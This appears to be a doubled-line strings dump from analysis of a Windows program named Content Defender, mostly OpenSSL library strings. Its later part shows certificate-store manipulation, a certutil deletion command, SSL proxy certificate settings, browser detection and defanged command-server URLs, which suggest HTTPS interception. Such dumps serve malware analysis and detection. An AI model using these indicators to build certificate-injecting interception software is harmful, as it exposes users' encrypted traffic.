unable to get issuer keyid
unable to get issuer keyid
policy syntax not currently supported
policy syntax not currently supported
operation not defined
operation not defined
no public key
no public key
no proxy cert policy language defined
no proxy cert policy language defined
no issuer certificate
no issuer certificate
extension setting not supported
extension setting not supported
V2I_EXTENDED_KEY_USAGE
V2I_EXTENDED_KEY_USAGE
V2I_AUTHORITY_KEYID
V2I_AUTHORITY_KEYID
S2I_SKEY_ID
S2I_SKEY_ID
S2I_ASN1_SKEY_ID
S2I_ASN1_SKEY_ID
R2I_CERTPOL
R2I_CERTPOL
d.registeredID
d.registeredID
d.iPAddress
d.iPAddress
d.uniformResourceIdentifier
d.uniformResourceIdentifier
d.ediPartyName
d.ediPartyName
d.directoryName
d.directoryName
d.dNSName
d.dNSName
d.rfc822Name
d.rfc822Name
d.otherName
d.otherName
IP Address:%d.%d.%d.%d
IP Address:%d.%d.%d.%d
URI:%s
URI:%s
DNS:%s
DNS:%s
email:%s
email:%s
EdiPartyName:
EdiPartyName:
X400Name:
X400Name:
othername:
othername:
.\crypto\x509v3\v3_skey.c
.\crypto\x509v3\v3_skey.c
.\crypto\x509v3\v3_akey.c
.\crypto\x509v3\v3_akey.c
PKEY_USAGE_PERIOD
PKEY_USAGE_PERIOD
certificateHold
certificateHold
Certificate Hold
Certificate Hold
cessationOfOperation
cessationOfOperation
Cessation Of Operation
Cessation Of Operation
keyCompromise
keyCompromise
Key Compromise
Key Compromise
%*sZone: %s, User:
%*sZone: %s, User:
d.usernotice
d.usernotice
d.cpsuri
d.cpsuri
d.other
d.other
CERTIFICATEPOLICIES
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sExplicit Text: %s
%*sNumber%s:
%*sNumber%s:
%*sOrganization: %s
%*sOrganization: %s
%*sCPS: %s
%*sCPS: %s
name.relativename
name.relativename
name.fullname
name.fullname
%*sOnly Attribute Certificates
%*sOnly Attribute Certificates
%*sOnly CA Certificates
%*sOnly CA Certificates
%*sOnly User Certificates
%*sOnly User Certificates
%*scrlUrl:
%*scrlUrl:
AUTHORITY_KEYID
AUTHORITY_KEYID
%d.%d.%d.%d/%d.%d.%d.%d
%d.%d.%d.%d/%d.%d.%d.%d
PROXY_CERT_INFO_EXTENSION
PROXY_CERT_INFO_EXTENSION
%*sPolicy Text: %s
%*sPolicy Text: %s
d.receiptList
d.receiptList
d.allOrFirstTier
d.allOrFirstTier
d.compressedData
d.compressedData
d.authenticatedData
d.authenticatedData
d.encryptedData
d.encryptedData
d.digestedData
d.digestedData
d.envelopedData
d.envelopedData
d.signedData
d.signedData
d.data
d.data
d.ori
d.ori
d.pwri
d.pwri
d.kekri
d.kekri
d.kari
d.kari
d.ktri
d.ktri
CMS_PasswordRecipientInfo
CMS_PasswordRecipientInfo
keyDerivationAlgorithm
keyDerivationAlgorithm
keyIdentifier
keyIdentifier
CMS_KeyAgreeRecipientInfo
CMS_KeyAgreeRecipientInfo
recipientEncryptedKeys
recipientEncryptedKeys
CMS_OriginatorIdentifierOrKey
CMS_OriginatorIdentifierOrKey
d.originatorKey
d.originatorKey
CMS_OriginatorPublicKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
CMS_KeyAgreeRecipientIdentifier
d.rKeyId
d.rKeyId
CMS_RecipientKeyIdentifier
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
CMS_OtherKeyAttribute
keyAttr
keyAttr
keyAttrId
keyAttrId
CMS_KeyTransRecipientInfo
CMS_KeyTransRecipientInfo
encryptedKey
encryptedKey
keyEncryptionAlgorithm
keyEncryptionAlgorithm
certificates
certificates
d.crl
d.crl
d.subjectKeyIdentifier
d.subjectKeyIdentifier
d.issuerAndSerialNumber
d.issuerAndSerialNumber
CMS_CertificateChoices
CMS_CertificateChoices
d.v2AttrCert
d.v2AttrCert
d.v1AttrCert
d.v1AttrCert
d.extendedCertificate
d.extendedCertificate
d.certificate
d.certificate
CMS_OtherCertificateFormat
CMS_OtherCertificateFormat
otherCert
otherCert
otherCertFormat
otherCertFormat
unsupported recpientinfo type
unsupported recpientinfo type
unsupported recipient type
unsupported recipient type
unsupported key encryption algorithm
unsupported key encryption algorithm
unsupported kek algorithm
unsupported kek algorithm
unsupported content type
unsupported content type
unsupported compression algorithm
unsupported compression algorithm
signer certificate not found
signer certificate not found
private key does not match certificate
private key does not match certificate
no private key
no private key
no password
no password
no msgsigdigest
no msgsigdigest
no key or cert
no key or cert
no key
no key
not supported for this key type
not supported for this key type
not key transport
not key transport
msgsigdigest wrong length
msgsigdigest wrong length
msgsigdigest verification failure
msgsigdigest verification failure
msgsigdigest error
msgsigdigest error
invalid key encryption parameter
invalid key encryption parameter
invalid encrypted key length
invalid encrypted key length
error setting key
error setting key
error getting public key
error getting public key
certificate verify error
certificate verify error
certificate has no keyid
certificate has no keyid
certificate already present
certificate already present
CMS_SIGNERINFO_VERIFY_CERT
CMS_SIGNERINFO_VERIFY_CERT
CMS_RecipientInfo_set0_pkey
CMS_RecipientInfo_set0_pkey
CMS_RecipientInfo_set0_password
CMS_RecipientInfo_set0_password
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_ktri_cert_cmp
CMS_RecipientInfo_ktri_cert_cmp
cms_msgSigDigest_add1
cms_msgSigDigest_add1
CMS_GET0_CERTIFICATE_CHOICES
CMS_GET0_CERTIFICATE_CHOICES
CMS_EncryptedData_set1_key
CMS_EncryptedData_set1_key
CMS_decrypt_set1_pkey
CMS_decrypt_set1_pkey
CMS_decrypt_set1_password
CMS_decrypt_set1_password
CMS_decrypt_set1_key
CMS_decrypt_set1_key
CMS_add1_recipient_cert
CMS_add1_recipient_cert
CMS_add0_recipient_password
CMS_add0_recipient_password
CMS_add0_recipient_key
CMS_add0_recipient_key
CMS_add0_cert
CMS_add0_cert
CONF part of OpenSSL 1.0.1g 7 Apr 2014
CONF part of OpenSSL 1.0.1g 7 Apr 2014
CONF_def part of OpenSSL 1.0.1g 7 Apr 2014
CONF_def part of OpenSSL 1.0.1g 7 Apr 2014
[[%s]]
[[%s]]
[%s] %s=%s
[%s] %s=%s
openssl.cnf
openssl.cnf
!BN_is_zero(p->zkpx.gr)
!BN_is_zero(p->zkpx.gr)
hash of key mismatch
hash of key mismatch
hash of hash of key mismatch
hash of hash of key mismatch
TXT_DB part of OpenSSL 1.0.1g 7 Apr 2014
TXT_DB part of OpenSSL 1.0.1g 7 Apr 2014
wrong number of fields on line %ld (looking for field %d, got %d, '%s' left)
wrong number of fields on line %ld (looking for field %d, got %d, '%s' left)
enc_key
enc_key
key_enc_algor
key_enc_algor
d.encrypted
d.encrypted
d.digest
d.digest
d.signed_and_enveloped
d.signed_and_enveloped
d.enveloped
d.enveloped
d.sign
d.sign
unsupported cipher type
unsupported cipher type
unknown operation
unknown operation
unable to find certificate
unable to find certificate
signing not supported for this key type
signing not supported for this key type
operation not supported on this type
operation not supported on this type
no recipient matches key
no recipient matches key
no recipient matches certificate
no recipient matches certificate
encryption not supported for this key type
encryption not supported for this key type
decrypted key is wrong length
decrypted key is wrong length
PKCS7_add_certificate
PKCS7_add_certificate
value.bag
value.bag
value.safes
value.safes
value.shkeybag
value.shkeybag
value.keybag
value.keybag
value.sdsicert
value.sdsicert
value.x509cert
value.x509cert
value.other
value.other
.\crypto\pkcs12\p12_crt.c
.\crypto\pkcs12\p12_crt.c
.\crypto\pkcs12\p12_key.c
.\crypto\pkcs12\p12_key.c
unsupported pkcs12 mode
unsupported pkcs12 mode
key gen error
key gen error
PKCS8_add_keyusage
PKCS8_add_keyusage
PKCS12_PBE_keyivgen
PKCS12_PBE_keyivgen
PKCS12_newpass
PKCS12_newpass
PKCS12_MAKE_SHKEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_KEYBAG
PKCS12_key_gen_uni
PKCS12_key_gen_uni
PKCS12_key_gen_asc
PKCS12_key_gen_asc
PKCS12_add_localkeyid
PKCS12_add_localkeyid
zlib not supported
zlib not supported
unimplemented public key method
unimplemented public key method
invalid cmd number
invalid cmd number
invalid cmd name
invalid cmd name
failed loading public key
failed loading public key
failed loading private key
failed loading private key
cmd not executable
cmd not executable
ENGINE_UNLOAD_KEY
ENGINE_UNLOAD_KEY
ENGINE_load_ssl_client_cert
ENGINE_load_ssl_client_cert
ENGINE_load_public_key
ENGINE_load_public_key
ENGINE_load_private_key
ENGINE_load_private_key
ENGINE_get_pkey_meth
ENGINE_get_pkey_meth
ENGINE_get_pkey_asn1_meth
ENGINE_get_pkey_asn1_meth
ENGINE_ctrl_cmd_string
ENGINE_ctrl_cmd_string
ENGINE_ctrl_cmd
ENGINE_ctrl_cmd
ENGINE_cmd_is_executable
ENGINE_cmd_is_executable
.\crypto\engine\eng_pkey.c
.\crypto\engine\eng_pkey.c
PKEY_ASN1
PKEY_ASN1
PKEY_CRYPTO
PKEY_CRYPTO
PKEY
PKEY
Software engine support
Software engine support
(TEST_ENG_OPENSSL_RC4) test_init_key() called
(TEST_ENG_OPENSSL_RC4) test_init_key() called
(TEST_ENG_OPENSSL_PKEY)Loading Private key %s
(TEST_ENG_OPENSSL_PKEY)Loading Private key %s
Dynamic engine loading support
Dynamic engine loading support
crlUrl
crlUrl
certStatus
certStatus
certId
certId
OCSP_CERTSTATUS
OCSP_CERTSTATUS
value.unknown
value.unknown
value.revoked
value.revoked
value.good
value.good
value.byKey
value.byKey
value.byName
value.byName
reqCert
reqCert
OCSP_CERTID
OCSP_CERTID
issuerKeyHash
issuerKeyHash
Content-Length: %d
Content-Length: %d
POST %s HTTP/1.0
POST %s HTTP/1.0
%*sIssuer Key Hash:
%*sIssuer Key Hash:
%*sCertificate ID:
%*sCertificate ID:
Revocation Reason: %s (0x%lx)
Revocation Reason: %s (0x%lx)
Cert Status: %s
Cert Status: %s
OCSP Response Status: %s (0x%lx)
OCSP Response Status: %s (0x%lx)
unsupported requestorname type
unsupported requestorname type
no certificates in chain
no certificates in chain
error parsing url
error parsing url
PARSE_HTTP_LINE1
PARSE_HTTP_LINE1
OCSP_parse_url
OCSP_parse_url
OCSP_cert_id_new
OCSP_cert_id_new
Verifying - %s
Verifying - %s
subkey
subkey
KRB5_ENCKEY
KRB5_ENCKEY
keyvalue
keyvalue
msgtype
msgtype
xxxxxxxx
xxxxxxxx
3unsupported version
3unsupported version
unsupported md algorithm
unsupported md algorithm
invalid signer certificate purpose
invalid signer certificate purpose
ess signing certificate error
ess signing certificate error
ess add signing cert error
ess add signing cert error
TS_VERIFY_CERT
TS_VERIFY_CERT
TS_TST_INFO_set_msg_imprint
TS_TST_INFO_set_msg_imprint
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_certs
TS_REQ_set_msg_imprint
TS_REQ_set_msg_imprint
TS_MSG_IMPRINT_set_algo
TS_MSG_IMPRINT_set_algo
TS_CHECK_SIGNING_CERTS
TS_CHECK_SIGNING_CERTS
ESS_SIGNING_CERT_NEW_INIT
ESS_SIGNING_CERT_NEW_INIT
ESS_CERT_ID_NEW_INIT
ESS_CERT_ID_NEW_INIT
ESS_ADD_SIGNING_CERT
ESS_ADD_SIGNING_CERT
Certificate required: %s
Certificate required: %s
Version: %d
Version: %d
the requested extension is not supported by the TSA
the requested extension is not supported by the TSA
the requested TSA policy is not supported by the TSA
the requested TSA policy is not supported by the TSA
transaction not permitted or supported
transaction not permitted or supported
unrecognized or unsupported algorithm identifier
unrecognized or unsupported algorithm identifier
Ordering: %s
Ordering: %s
Message digest algorithm is not supported.
Message digest algorithm is not supported.
Requested policy is not supported.
Requested policy is not supported.
dddddd
dddddd
Unsupported extension.
Unsupported extension.
Hash Algorithm: %s
Hash Algorithm: %s
unable to load certificate: %s
unable to load certificate: %s
unable to load certificates: %s
unable to load certificates: %s
unable to load private key: %s
unable to load private key: %s
variable lookup failed for %s::%s
variable lookup failed for %s::%s
invalid variable value for %s::%s
invalid variable value for %s::%s
signer_cert
signer_cert
signer_key
signer_key
ess_cert_id_chain
ess_cert_id_chain
ESS_SIGNING_CERT
ESS_SIGNING_CERT
cert_ids
cert_ids
ESS_CERT_ID
ESS_CERT_ID
cert_req
cert_req
msg_imprint
msg_imprint
TS_MSG_IMPRINT
TS_MSG_IMPRINT
hashed_msg
hashed_msg
IBM 4758 CCA hardware engine support
IBM 4758 CCA hardware engine support
IBM_4758_LOAD_PUBKEY
IBM_4758_LOAD_PUBKEY
IBM_4758_LOAD_PRIVKEY
IBM_4758_LOAD_PRIVKEY
IBM 4758 CCA RSA key handle
IBM 4758 CCA RSA key handle
AEP_ModExpCrt
AEP_ModExpCrt
Aep hardware engine support
Aep hardware engine support
mod exp crt failed
mod exp crt failed
missing key components
missing key components
AEP_MOD_EXP_CRT
AEP_MOD_EXP_CRT
ASI_RSAPrivateKeyOpFn
ASI_RSAPrivateKeyOpFn
Atalla hardware engine support
Atalla hardware engine support
swAttachKeyParam
swAttachKeyParam
CryptoSwift hardware engine support
CryptoSwift hardware engine support
bad key size
bad key size
CSWIFT_MOD_EXP_CRT
CSWIFT_MOD_EXP_CRT
HWCryptoHook_ModExpCRT
HWCryptoHook_ModExpCRT
HWCryptoHook_RSAUnloadKey
HWCryptoHook_RSAUnloadKey
HWCryptoHook_RSAGetPublicKey
HWCryptoHook_RSAGetPublicKey
HWCryptoHook_RSALoadKey
HWCryptoHook_RSALoadKey
CHIL hardware engine support
CHIL hardware engine support
private key algorithms disabled
private key algorithms disabled
HWCRHK_LOAD_PUBKEY
HWCRHK_LOAD_PUBKEY
HWCRHK_LOAD_PRIVKEY
HWCRHK_LOAD_PRIVKEY
HWCRHK_GET_PASS
HWCRHK_GET_PASS
pass phrase
pass phrase
Insert card "%s"
Insert card "%s"
Current card: "%s"
Current card: "%s"
nFast HWCryptoHook RSA key handle
nFast HWCryptoHook RSA key handle
Nuron hardware engine support
Nuron hardware engine support
SureWareHook_Load_Dsa_Pubkey
SureWareHook_Load_Dsa_Pubkey
SureWareHook_Load_Rsa_Pubkey
SureWareHook_Load_Rsa_Pubkey
SureWareHook_Info_Pubkey
SureWareHook_Info_Pubkey
SureWareHook_Load_Privkey
SureWareHook_Load_Privkey
SureWare hardware engine support
SureWare hardware engine support
SUREWAREHK_LOAD_PUBKEY
SUREWAREHK_LOAD_PUBKEY
SUREWAREHK_LOAD_PRIVKEY
SUREWAREHK_LOAD_PRIVKEY
ENGINE_load_privkey
ENGINE_load_privkey
ENGINE_load_pubkey
ENGINE_load_pubkey
SureWareHook DSA key handle
SureWareHook DSA key handle
SureWareHook RSA key handle
SureWareHook RSA key handle
ubsec_max_key_len_ioctl
ubsec_max_key_len_ioctl
rsa_mod_exp_crt_ioctl
rsa_mod_exp_crt_ioctl
UBSEC hardware engine support
UBSEC hardware engine support
UBSEC_RSA_MOD_EXP_CRT
UBSEC_RSA_MOD_EXP_CRT
UBSEC_MOD_EXP_CRT
UBSEC_MOD_EXP_CRT
UBSEC_DH_GENERATE_KEY
UBSEC_DH_GENERATE_KEY
UBSEC_DH_COMPUTE_KEY
UBSEC_DH_COMPUTE_KEY
/dev/ubskey
/dev/ubskey
VIA PadLock (%s, %s)
VIA PadLock (%s, %s)
Certificate store flags: 1 = system store
Certificate store flags: 1 = system store
certificate store name, default "MY"
certificate store name, default "MY"
Set key lookup method (1=substring, 2=friendlyname, 3=container name)
Set key lookup method (1=substring, 2=friendlyname, 3=container name)
Set list options (1=summary,2=friendly name, 4=full printout, 8=PEM output, 16=XXX, 32=private key info)
Set list options (1=summary,2=friendly name, 4=full printout, 8=PEM output, 16=XXX, 32=private key info)
Key type: 1=AT_KEYEXCHANGE (default), 2=AT_SIGNATURE
Key type: 1=AT_KEYEXCHANGE (default), 2=AT_SIGNATURE
key_type
key_type
Lookup and output certificates
Lookup and output certificates
lookup_cert
lookup_cert
List all certificates in store
List all certificates in store
list_certs
list_certs
unsupported public key algorithm
unsupported public key algorithm
unsupported padding
unsupported padding
unsupported algorithm nid
unsupported algorithm nid
pubkey export length error
pubkey export length error
pubkey export error
pubkey export error
invalid rsa public key blob magic number
invalid rsa public key blob magic number
invalid public key blob
invalid public key blob
invalid dsa public key blob magic number
invalid dsa public key blob magic number
getuserkey error
getuserkey error
function not supported
function not supported
error getting key provider info
error getting key provider info
error adding cert
error adding cert
cant get key
cant get key
CLIENT_CERT_SELECT
CLIENT_CERT_SELECT
CERT_SELECT_DIALOG
CERT_SELECT_DIALOG
CAPI_LOAD_PRIVKEY
CAPI_LOAD_PRIVKEY
CAPI_GET_PKEY
CAPI_GET_PKEY
CAPI_GET_KEY
CAPI_GET_KEY
CAPI_CERT_GET_FNAME
CAPI_CERT_GET_FNAME
capi_get_provname, returned name=%s, type=%d
capi_get_provname, returned name=%s, type=%d
capi_get_provname, index=%d
capi_get_provname, index=%d
%d. %s, type %d
%d. %s, type %d
Container Name: %s, Key Type %d
Container Name: %s, Key Type %d
Provider Name: %s, Provider Type %d
Provider Name: %s, Provider Type %d
Private Key Info:
Private Key Info:
No Private Key
No Private Key
%d. %s
%d. %s
Container name %s, len=%d, index=%d, flags=%d
Container name %s, len=%d, index=%d, flags=%d
Got max container len %d
Got max container len %d
Listing containers CSP=%s, type = %d
Listing containers CSP=%s, type = %d
capi_cert_get_fname
capi_cert_get_fname
Friendly Name "%s"
Friendly Name "%s"
Opening certificate store %s
Opening certificate store %s
capi_get_key, contname=%s, provname=%s, type=%d
capi_get_key, contname=%s, provname=%s, type=%d
capi_ctx_set_provname, name=%s, type=%d
capi_ctx_set_provname, name=%s, type=%d
aiKeyAlg=0x
aiKeyAlg=0x
Certificate %d
Certificate %d
Listing certs for store %s
Listing certs for store %s
Can't Parse Certificate %d
Can't Parse Certificate %d
Setting key type to %d
Setting key type to %d
Setting debug file to %s
Setting debug file to %s
Setting debug level to %d
Setting debug level to %d
Setting flags to %d
Setting flags to %d
Setting store name to %s
Setting store name to %s
unsupported parameter set
unsupported parameter set
unsupported cipher ctl command
unsupported cipher ctl command
public key undefined
public key undefined
no private part of non ephemeral keypair
no private part of non ephemeral keypair
no peer key
no peer key
mac key not set
mac key not set
key parameters missing
key parameters missing
key is not initialized
key is not initialized
key is not initalized
key is not initalized
invalid mac key length
invalid mac key length
incompatible peer key
incompatible peer key
error parsing key transport info
error parsing key transport info
error packing key transport info
error packing key transport info
error computing shared key
error computing shared key
cannot pack ephemeral key
cannot pack ephemeral key
bad pkey parameters format
bad pkey parameters format
bad key parameters format
bad key parameters format
PKEY_GOST_MAC_KEYGEN
PKEY_GOST_MAC_KEYGEN
PKEY_GOST_MAC_CTRL_STR
PKEY_GOST_MAC_CTRL_STR
PKEY_GOST_MAC_CTRL
PKEY_GOST_MAC_CTRL
PKEY_GOST_CTRL94_STR
PKEY_GOST_CTRL94_STR
PKEY_GOST_CTRL01_STR
PKEY_GOST_CTRL01_STR
PKEY_GOST_CTRL
PKEY_GOST_CTRL
PKEY_GOST94_PARAMGEN
PKEY_GOST94_PARAMGEN
PKEY_GOST94CP_KEYGEN
PKEY_GOST94CP_KEYGEN
PKEY_GOST94CP_ENCRYPT
PKEY_GOST94CP_ENCRYPT
PKEY_GOST94CP_DECRYPT
PKEY_GOST94CP_DECRYPT
PKEY_GOST2001_DERIVE
PKEY_GOST2001_DERIVE
PKEY_GOST01_PARAMGEN
PKEY_GOST01_PARAMGEN
PKEY_GOST01CP_KEYGEN
PKEY_GOST01CP_KEYGEN
PKEY_GOST01CP_ENCRYPT
PKEY_GOST01CP_ENCRYPT
PKEY_GOST01CP_DECRYPT
PKEY_GOST01CP_DECRYPT
GOST2001_KEYGEN
GOST2001_KEYGEN
.\engines\ccgost\gost2001_keyx.c
.\engines\ccgost\gost2001_keyx.c
gkt->key_info->imit->length==4
gkt->key_info->imit->length==4
gkt->key_info->encrypted_key->length==32
gkt->key_info->encrypted_key->length==32
gkt->key_agreement_info->eph_iv->length==8
gkt->key_agreement_info->eph_iv->length==8
.\engines\ccgost\gost94_keyx.c
.\engines\ccgost\gost94_keyx.c
Parameter set: %s
Parameter set: %s
Public key:
Public key:
Private key:
Private key:
Public key:
Public key:
GOST_CLIENT_KEY_EXCHANGE_PARAMS
GOST_CLIENT_KEY_EXCHANGE_PARAMS
GOST_KEY_PARAMS
GOST_KEY_PARAMS
key_params
key_params
GOST_KEY_AGREEMENT_INFO
GOST_KEY_AGREEMENT_INFO
ephem_key
ephem_key
GOST_KEY_INFO
GOST_KEY_INFO
encrypted_key
encrypted_key
GOST_KEY_TRANSPORT
GOST_KEY_TRANSPORT
key_agreement_info
key_agreement_info
key_info
key_info
ENGINE_set_cmd_defns failed
ENGINE_set_cmd_defns failed
ENGINE_set_pkey_asn1_meths failed
ENGINE_set_pkey_asn1_meths failed
ENGINE_set_pkey_meths failed
ENGINE_set_pkey_meths failed
c:\toolchain\src\openssl-1.0.1g\openssl-1.0.1g\out32dll\libeay32.pdb
c:\toolchain\src\openssl-1.0.1g\openssl-1.0.1g\out32dll\libeay32.pdb
l}C.we
l}C.we
Operation not permitted
Operation not permitted
Inappropriate I/O control opera
Inappropriate I/O control opera
Broken pipe
Broken pipe
CryptDestroyKey
CryptDestroyKey
ReportEventA
ReportEventA
CryptExportKey
CryptExportKey
CryptGetUserKey
CryptGetUserKey
CertFreeCertificateContext
CertFreeCertificateContext
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertOpenStore
CertOpenStore
CertFindCertificateInStore
CertFindCertificateInStore
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertCloseStore
CertCloseStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
_malloc_crt
_malloc_crt
_amsg_exit
_amsg_exit
_crt_debugger_hook
_crt_debugger_hook
GetProcessWindowStation
GetProcessWindowStation
484484484445
484484484445
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
cd.exe_532:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
w%s(
w%s(
}.hD]F
}.hD]F
?%u4W
?%u4W
Certificate name reading failed
Certificate name reading failed
Certificate %s, Is our: %s
Certificate %s, Is our: %s
Certificate deleted
Certificate deleted
Certificate deletion failed
Certificate deletion failed
Store %s opening %s
Store %s opening %s
Check folder for certificate:
Check folder for certificate:
cert8.db
cert8.db
Can't open category key
Can't open category key
For category %s enable %s detected
For category %s enable %s detected
----------------- Domains in category %s-----------------
----------------- Domains in category %s-----------------
Category %s enabled: %s
Category %s enabled: %s
FAdvapi32.dll
FAdvapi32.dll
RegOpenKeyTransactedA
RegOpenKeyTransactedA
RegCreateKeyTransactedA
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
RegDeleteKeyTransactedA
FRegDeleteKeyExA
FRegDeleteKeyExA
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
HTTP/1.1 404 Not OK
HTTP/1.1 404 Not OK
Web Content Blocked by Content Defender
"
Web Content Blocked by Content Defender
"
HTTP/1.1 204 No Content
HTTP/1.1 204 No Content
Content type for endpoint %u is %s
Content type for endpoint %u is %s
\Content Defender\nss\certutil.exe -D -n "ContentDefender 2" -d
\Content Defender\nss\certutil.exe -D -n "ContentDefender 2" -d
\Content Defender\cert
\Content Defender\cert
2.5.4.3
2.5.4.3
Certificate Name is
Certificate Name is
/version/%uu
/version/%uu
cert
cert
Invalid JSON array: %c%c%c%c
Invalid JSON array: %c%c%c%c
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
{"level":"%u","type":"%u","process":"ContentDefender","text":"%s","os":"Windows %u.%u %u bit",
{"level":"%u","type":"%u","process":"ContentDefender","text":"%s","os":"Windows %u.%u %u bit",
Content-type:application/x-www-form-urlencoded; charset=utf8
Content-type:application/x-www-form-urlencoded; charset=utf8
Checking for process id: %u
Checking for process id: %u
Process with id %u recognized as %s
Process with id %u recognized as %s
%s %u.%u
%s %u.%u
opera
opera
firefox
firefox
https
https
HTTP/1.1
HTTP/1.1
Code detected as error: %s
Code detected as error: %s
ConDefSetup.exe
ConDefSetup.exe
url: %s code: %s
url: %s code: %s
{"os":"Windows %u.%u",
{"os":"Windows %u.%u",
"%s",
"%s",
Content-type:application/x-www-form-urlencoded
Content-type:application/x-www-form-urlencoded
Mscoree.dll
Mscoree.dll
successurl
successurl
hXXp://contentdefender-cis1.org/data/get/
hXXp://contentdefender-cis1.org/data/get/
hXXp://contentdefender-cis1.org/error/index/
hXXp://contentdefender-cis1.org/error/index/
hXXp://contentdefender-cis1.org
hXXp://contentdefender-cis1.org
contentdefender-cis1.org
contentdefender-cis1.org
condef.sys
condef.sys
hXXp://contentdefender-cis1.org/version/checknew/
hXXp://contentdefender-cis1.org/version/checknew/
hXXp://contentdefender-cis2.org
hXXp://contentdefender-cis2.org
hXXp://contentdefender-cis3.org
hXXp://contentdefender-cis3.org
hXXp://contentdefender-cis4.org
hXXp://contentdefender-cis4.org
hXXp://contentdefender-cis5.org
hXXp://contentdefender-cis5.org
%s open failed, code %u
%s open failed, code %u
Domain filtering: %s Words filtering: %s
Domain filtering: %s Words filtering: %s
%u badwords detected
%u badwords detected
Opening of words key failed
Opening of words key failed
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
operator
operator
GetProcessWindowStation
GetProcessWindowStation
\\.\CtrlSM
\\.\CtrlSM
system32\drivers\%s.sys
system32\drivers\%s.sys
SYSTEM\CurrentControlSet\Services\%s
SYSTEM\CurrentControlSet\Services\%s
Tcpip
Tcpip
SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
Wtsapi32.dll
Wtsapi32.dll
SSL\SSLDataProvider.cpp
SSL\SSLDataProvider.cpp
critical,keyCertSign,cRLSign
critical,keyCertSign,cRLSign
%s-%s#ss
%s-%s#ss
%s-%s-%s#child
%s-%s-%s#child
1.3.6.1.5.5.7.3.1
1.3.6.1.5.5.7.3.1
1.3.6.1.4.1.311.10.3.3
1.3.6.1.4.1.311.10.3.3
2.16.840.1.113730.4.1
2.16.840.1.113730.4.1
127.0.0.1
127.0.0.1
HTTP/1.
HTTP/1.
http/1.
http/1.
PORT
PORT
504 Unsupported transfer mode
504 Unsupported transfer mode
504 Unsupported command
504 Unsupported command
PORT
PORT
%s.%s.%s.%s:%d
%s.%s.%s.%s:%d
%s:%s
%s:%s
[%s]:%s
[%s]:%s
File-Count: %d
File-Count: %d
Total-Bytes: %d
Total-Bytes: %d
File-Name: %s
File-Name: %s
{0946134E-4C7F-11D1-8222-444553540000}
{0946134E-4C7F-11D1-8222-444553540000}
C:\prg\ContentDefender\Release\cd.pdb
C:\prg\ContentDefender\Release\cd.pdb
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ReportEventA
ReportEventA
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegQueryInfoKeyW
RegQueryInfoKeyW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetOpenUrlA
InternetOpenUrlA
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
WININET.dll
WININET.dll
PSAPI.DLL
PSAPI.DLL
VERSION.dll
VERSION.dll
CertOpenStore
CertOpenStore
CertCloseStore
CertCloseStore
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertFreeCertificateContext
CertFreeCertificateContext
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertEnumSystemStore
CertEnumSystemStore
CertGetNameStringA
CertGetNameStringA
CertCreateContext
CertCreateContext
CRYPT32.dll
CRYPT32.dll
WS2_32.dll
WS2_32.dll
SSLEAY32.dll
SSLEAY32.dll
LIBEAY32.dll
LIBEAY32.dll
GetCPInfo
GetCPInfo
CertAddEncodedCertificateToStore
CertAddEncodedCertificateToStore
CertGetCertificateChain
CertGetCertificateChain
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
CertFreeCertificateChain
CertFreeCertificateChain
CertOpenSystemStoreA
CertOpenSystemStoreA
CertFindCertificateInStore
CertFindCertificateInStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
PFXExportCertStoreEx
PFXExportCertStoreEx
zcÃ
zcÃ
